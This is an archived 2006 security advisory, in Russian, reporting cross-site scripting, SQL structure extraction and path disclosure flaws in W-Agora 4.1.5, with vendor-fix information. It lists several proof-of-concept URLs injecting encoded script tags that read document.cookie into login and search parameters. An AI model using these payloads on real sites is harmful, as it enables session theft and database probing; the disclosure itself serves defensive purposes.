Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:15442
HistoryDec 20, 2006 - 12:00 a.m.

Vulnerabilities в W-Agora

2006-12-2000:00:00
vulners.com
8

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною 22.11.2006 уязвимостях в W-Agora 4.1.5 (<= 4.1.5). Это Cross-Site Scripting, SQL DB Structure Extraction та Full path disclosure уязвимости.

Уязвимости в скрипте search.php3.
XSS:

http://site/news/search.php3?site=x&amp;bn=y_news&amp;gosearch=1&amp;sf=1&amp;pattern=&#37;3Cscript&#37;3Ealert&#40;document.cookie&#41;&#37;3C/script&#37;3E

SQL DB Structure Extraction:

http://site/news/search.php3?site=x&amp;bn=y_news&amp;gosearch=1&amp;sf=1&amp;pattern=xxxxxxxxxx

Уязвимости в скрипте list.php.

XSS:

http://site/static/list.php?key=&#37;3Cscript&#37;3Ealert&#40;document.cookie&#41;&#37;3C/script&#37;3E

http://site/static/list.php?key=-1102352364

Уязвимости в скрипте login.php3.

XSS:

http://site/news/login.php3?site=x&amp;bn=y_news&amp;loginform=1&amp;loginuser=&#37;22&#37;3E&#37;3Cscript&#37;3Ealert&#40;document.cookie&#41;&#37;3C/script&#37;3E
http://site/news/login.php3?site=x&amp;bn=y_news&amp;loginform=1&amp;loginpassword=&#37;22&#37;3E&#37;3Cscript&#37;3Ealert&#40;document.cookie&#41;&#37;3C/script&#37;3E
http://site/news/login.php3?site=x&amp;bn=y_news&amp;loginform=1&amp;redirect_url=&#37;22&#37;3E&#37;3Cscript&#37;3Ealert&#40;document.cookie&#41;&#37;3C/script&#37;3E
http://site/news/login.php3?site=x&amp;bn=y_news&amp;loginform=1&amp;editsite=&#37;22&#37;3E&#37;3Cscript&#37;3Ealert&#40;document.cookie&#41;&#37;3C/script&#37;3E
http://site/news/login.php3?site=x&amp;bn=y_news&amp;loginform=1&amp;userid=&#37;22&#37;3E&#37;3Cscript&#37;3Ealert&#40;document.cookie&#41;&#37;3C/script&#37;3E

Дополнительная информация о данной уязвимости у меня на сайте:
http://websecurity.com.ua/425/

Данные уязвимости имеют место в W-Agora 4.1.5 (и предыдущих версиях). Как мне уже сообщил разработчик системы W-Agora, все упомянутые уязвимости уже исправлены в последней версии 4.2.1. Которая недавно вышла и доступна на сайте разработчика.

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua